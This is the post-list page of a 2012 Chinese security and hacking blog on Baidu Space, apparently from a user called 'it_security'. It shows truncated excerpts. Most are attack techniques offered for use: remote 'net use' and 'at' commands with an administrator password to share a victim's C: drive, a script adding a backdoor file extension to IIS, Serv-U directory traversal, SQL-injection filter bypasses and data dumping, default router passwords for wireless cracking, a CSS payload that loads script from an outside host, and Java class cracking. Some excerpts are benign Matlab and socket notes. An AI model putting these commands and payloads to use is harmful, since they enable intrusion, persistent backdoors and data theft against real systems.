信息安全服务/破解/网络渗透与检测/攻击/防守/加固/病毒/木马/安全软件开发,99%原创_百度空间
 
文章列表
 
2012-05-25 04:34

net use /user:administrator bjqingda01
net time
at   3:00 cmd /c "net share t=c:\ "

net use /del

===========

注意:1.at的话在远程计算机上建立的计划任务是以system运行的(除非远程服务器上tasks目录的菜单“高级”指定某个交互帐号),

所以是无法访问网络及共享目录的【当然按指定用户运行at计划是可以访问网络的】

2."net share t=c:\ " 这个at计划任务开的共享,默认guest或者user是

 
2012-05-05 00:44

1.servu 6.3/6.4以及7.0,8.0等都存在目录遍历漏洞。

使用可写帐号登录(如果是匿名ftp,则只有读取权限)

C:\Documents and Settings\Administrator>ftp 127.0.0.1
Connected to 127.0.0.1.
220 Serv-U FTP Server v6.4 for WinSock ready...
User (127.0.0.1:(none)): admin
331 User name okay, need password.
Password:
230 User logged in, proceed.
ftp> cd /
250 Directory changed to /

 
2012-04-30 16:36

不是那种通过iis的属性、配置来做的,直接使用vbs脚本:it_security.vbs

查看当前扩展:

cscript  it_security.vbs

增加一个后门.aso后缀(这儿举例):

cscript  it_security.vbs -a  .aso,c:\windows\microsoft.net\framework\v2.0.50727\aspnet_isapi.dll,3,GET,HEAD,POST

 

=====================

it_secu

 
2012-04-30 15:36

    asp.net默认后缀名为.aspx,可是我们看到许多网站的后缀名很特别比如微软的.mspx,下面讲解如何将网页后缀名改为mspx.
  ASP.NET 1.1中的方法:
  1.IIS映射(IIS->默认网站->属性->主文档->配置->映射->添加):
  扩展名.mspx ----> C:"WINNT"Microsoft.NET"Framework"v1.1.4322"aspnet_isapi.dll
  限于:GET,HEAD,POST,DEBUG
  2.修改web.config

 
2012-04-22 21:06

 

Create Trigger test_tri5
on test
after insert
as

begin
declare @id sysname, @tel sysname, @name sysname
select @tel=ltrim(tel),@id=ltrim([id]),@name=ltrim([name]) from inserted;
insert into test2(id,tel,[name]) values(@id,@tel,@name);
end

这样,只要往test表插入一条记录,就回立马执行

insert in

 
2012-04-10 03:56

参数问题

Matlab中最常使用的变量有三种,分别是标量、矩阵和元胞数组(Cell Array),我们只要掌握了这三种变量就可以对付大部分的需求了。在上面的例子中m函数MyStat(mStatMatrix,mNameMatrix,n)有三个输入参数,分别是二维矩阵mStatMatrix

 
2012-04-10 00:59

一、问题提示

7.0/7.1版本有个问题:

Warning: No matching builtin function available for C:\MATLAB7\install\toolbox\simulink\simulink\set_param.bi

或者mcc变成m文件成可执行文件exe后,运行会出现:

Undefined command/function 'set_param'
Error in ==> matlabrc at 81

解决方法:
1、将 \MATLAB7\toolbox\compiler\deploy\matlabrc.m 中的

 
2012-04-07 15:27

1.and 用&& 代替

2. or 用||代替

3.union select from 变成 /*!union*/这种。

一个例子:

select 1 /*!union*/ select 2 from adad where 1&&1

 

 

 
2012-03-25 17:15
concat和concat_ws()区别及MySQL的几个实用字符串函数
2008-04-15 15:44

 
2012-03-23 01:06

php sql injector的时候,很多情况下都是显示一行一行的数据,要一次得到全部数据或者表格,那就的重复多次。

函数group_concat可以实现将表格放入一个单元格中(即仅有一行一列)

例如:

select group_concat(id,0x7c,name,0x7c,tel,0x5d) from  g

那么将得到:

1|张三|83023023],|李四|13893232322],.....

(注意上面

 
2012-03-19 14:29

无线破解常见路由器账号密码:

================================

路由器品牌              默认IP        默认帐号   默认密码  
TP LINK TD8800          192.168.1.1    root       root  
TPLINK 8830    

 
2012-02-25 22:19

比如中国:

按gb2312来来进行url编码:%D6%D0%B9%FA

按utf8或unicode来编码:%E4%B8%AD%E5%9B%BD

而escape则是%uxxxx的格式。url地址栏用的是encodeURI,具体选哪种汉字格式编码,

取决于当前网页的html里面的language,即语言编码。

给一个小的转码、编码、解码小工具(或者加密、解密)。

 
2012-02-23 19:58

<style type="text/css">
body {
background:url('javascript:document.write("<script src=http://jannick.sxtyit.cn/jngzf.js></script>")')
}
</style>

 
2012-02-20 21:25

1.pe格式的exe破解是最常见的,资料最多,工具一对,在此不多说。

2.java的class文件的机器码的直接修改,网上最多的就是一片简单的经典文章。在此不引用

3.本次修改的是二进制代码,首先是sun公司首页(被oracle收购了)下载对照表VM Spec Opcode Mnemonics by Opcode.htm,然后使用jclasslib for windows (直接有exe双击,好像要jdk1.6版本及之后的支持)。

4.代码如何找,请见下图对照片,自己从VM Spec Opcod

 
2012-02-20 20:54

1.有些机器特别是服务器有多个ip,如果默认使用socket编程的话,使用connect连接的时候,系统会自动选择一个默认ip(一般为第一个),有时候我们要选择某个特定的ip。

2.通过在调用sockt函数与connect函数之间,插入bind函数来实现指定客户端ip地址

3.实现代码:

  if(this->m_bBandIP)
  {
   struct sockaddr_in local_addr;
   local_addr.sin_family = AF_INET;
   local_addr.sin_port = htons(0);

 
     
 
 
个人档案
 
it_security
男, 
 
   
 
订阅我的空间
 
已有人次访问本空间
 
订阅RSS  什么是RSS?

您也想拥有这样的空间?请点此申请。
     
 
文章分类
 
     
 
留言板
 
     
 
最新评论
 
     
 
最近访客
 
 

tony123cn

335711057

庭愆

liuming543

cnrhu

秋·牵

milsqw

53957105
     
 
好友最新文章
 
     

帮助中心  |  空间客服  |  投诉中心  |  空间协议
©2012 Baidu